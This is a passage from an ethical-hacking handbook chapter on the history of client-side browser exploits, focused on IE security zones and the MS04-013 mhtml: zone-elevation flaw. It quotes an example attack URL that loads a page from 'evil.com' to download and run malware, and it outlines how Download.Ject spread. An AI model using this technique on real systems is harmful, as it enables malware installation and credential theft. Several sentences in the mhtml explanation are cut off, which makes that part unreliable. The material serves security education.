or unsafe ActiveX controls, could run Java applets without prompt, and could run all
kinds of super dangerous stuff that attackers would love to be able to do from their attack
web page. It was basically trivial for attackers to install malware onto a victim workstation
if they could get their web page loaded in the LMZ. These attacks were called zone elevation
attacks, and their goal was to jump cross-zone (from the Internet zone to the Local
Machine zone, for instance) to run scripts with fewer security restrictions. As we look next
at real-world client-side attack examples, you will understand why attackers would try so
hard and jump through so many hoops to get an attack web page loaded in the LMZ.
References
Security changes in XP SP2 www.microsoft.com/technet/prodtechnol/winxppro/maintain/
sp2brows.mspx
Description of IE security zones http://msdn2.microsoft.com/en-us/library/ms537183.aspx
History of Client-Side Exploits
and Latest Trends
Client-side vulnerabilities and attacks abusing those vulnerabilities have been around
for years. In fact, one of the earliest security bulletins (MS98-011) listed in Microsoft’s
security bulletin search fixed an IE4 client-side vulnerability in JScript parsing. However,
the attacks of 1998 were more often vulnerabilities having direct attack vectors, rather
than those abusing client-side vulnerabilities. On the Windows platform, client-side
vulnerabilities have become more prominent only in the last few years. In this section,
we’ll take a short trip down memory lane to look at some of the more prominent vulnerabilities
used by attackers to infect victims with malware. If you’re more interested in the
discovery of new vulnerabilities than the history of this genre of attack, feel free to skip
ahead to the next section.
Client-Side Vulnerabilities Rise to Prominence
The year 2004 brought two important changes to the landscape of software security and
malicious attacks. First, Service Pack 2 for Windows XP with its on-by-default firewall
and security-hardened system services arrived and was pushed out over Windows
Update to millions of computers, largely protecting consumers from directed attacks.
Second, cybercriminals became more aggressive, targeting consumers with malware
downloads. An entire industry sprang up offering a malware “pay-per-install” business
model and didn’t ask any questions about how their “software” got installed. With
money as an incentive and firewalls as a barrier, malicious criminals turned their attention
to client-side attacks.
One interesting way to observe the growth of client-side vulnerabilities is to look at
the proportion of Microsoft security bulletins released addressing client-side vulnerabilities
compared with other vulnerabilities. Symantec did exactly this analysis early in
Chapter 15: Client-Side Browser Exploits
363
PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
364
2007 and published the chart seen in Figure 15-1. The light color is client-side vulnerabilities
and the dark is other vulnerabilities.
Reference
Symantec blog posting with Figure 15-1 context
www.symantec.com/enterprise/security_response/weblog/2007/02/microsoft_patch_tuesday_
februa.html
Notable Vulnerabilities in the History
of Client-Side Attacks
To understand the present-day threat environment from client-side attacks, it will help
to understand recent history and the set of attacks that got us here. Due to its prevalence,
we’ll again focus on vulnerabilities affecting Microsoft Windows.
MS04-013 (Used by Ibiza and then Download.Ject Attacks)
This vulnerability was a zone elevation attack that resulted in an attacker’s HTML being
loaded in the Local Machine zone (LMZ). It was also the first widespread “browse-andyou’re-
owned” attack and scared a lot of people into using Firefox. And it was the first
time Russian cybercriminals were so blatantly involved in such an organized fashion. So
it’s important to start here.
From the security zones discussion earlier, remember that web pages loaded in the
LMZ can do all sorts of dangerous stuff. The favorite LMZ trick of 2004 was to use the
ActiveX control ADODB.Stream installed by default on Windows as part of MDAC
(Microsoft Data Access Components) to download and run files from the Internet.
ADODB.Stream would only do this when run from the trusted Local Machine zone.
Figure 15-1
Proportion of
Microsoft
security updates
addressing clientside
vulnerabilities
The actual vulnerability used in the Ibiza and Download.Ject attacks was in the mhtml:
protocol handler. A protocol handler is code that handles protocols like http:, ftp:, and
rtsp:. Internet Explorer passes the URL following the protocol name to the protocol handler
to, well, handle. The mhtml: protocol URLs are of the following form: “mhtml://
However, the mhtml: protocol handler had a critical flaw that allowed a cross-zone elevation
from the Internet zone into the LMZ. If the
was not reachable, IE would load only the
the same security zone where the ROOT-URL would have been loaded if it had existed.
More concretely, imagine what would happen given the vulnerable mhtml: protocol
handler loading this URL: “mhtml:file://c:/bogus.mht!http://evil.com/evil.html”. The
that they knew would never exist. The location could not be found, but IE still
navigates to the
the
Download.Ject, this evil.html used ADODB.Stream to download and run arbitrary files
on the computer that browsed to the web page hosting the exploit. The Download.Ject
attack further attempted to propagate itself by looking for HTML files on the compromised
system and appending attack code to the footer of every page. It was an elaborate
attack propagated by Russian cybercriminals who used it to harvest credit card numbers
and username/passwords via key loggers. The malware side of this attack was super
interesting and you can find more by reading the sites listed in the references.
So, a short recap of the Ibiza and Download.Ject attacks:
• An unsuspecting web browser visits an untrusted page in the Internet zone.
• Attacker abuses a cross-zone vulnerability in the mhtml: protocol handler,
which causes the attacker’s HTML page to load into the Local Machine zone.
• From the Local Machine zone, the attacker uses the ADODB.Stream ActiveX
control to download and run malware.
This attack required discovery of a vulnerability in how the protocol handler worked.
There was no buffer overrun involved here, no shellcode or fancy tricks to redirect execution
flow from the assembly level.
References
Download.Ject malware story www.answers.com/topic/download-ject
http://xforce.iss.net/xforce/alerts/id/177
Ibiza Attacks www.securityfocus.com/bid/9658/exploit
Microsoft’s Download.Ject response www.microsoft.com/security/incident/download_
ject.mspx?info=EXLINK
MS04-040 (IFRAME Tag Parsing Buffer Overrun)
The next client-side vulnerability that was used in widespread attacks was an HTML
parsing vulnerability in Internet Explorer. Michal Zalewski in October 2004 wrote an
Chapter 15: Client-Side Browser Exploits
365
PART IV
HTML fuzzer that he called MangleMe. He used it to find several Internet Explorer
crashes that he posted to Bugtraq along with a copy of his tool. A hacker named ned
then used a Python port of this tool to find a simple bug that ended up being abused by
hackers for years afterward.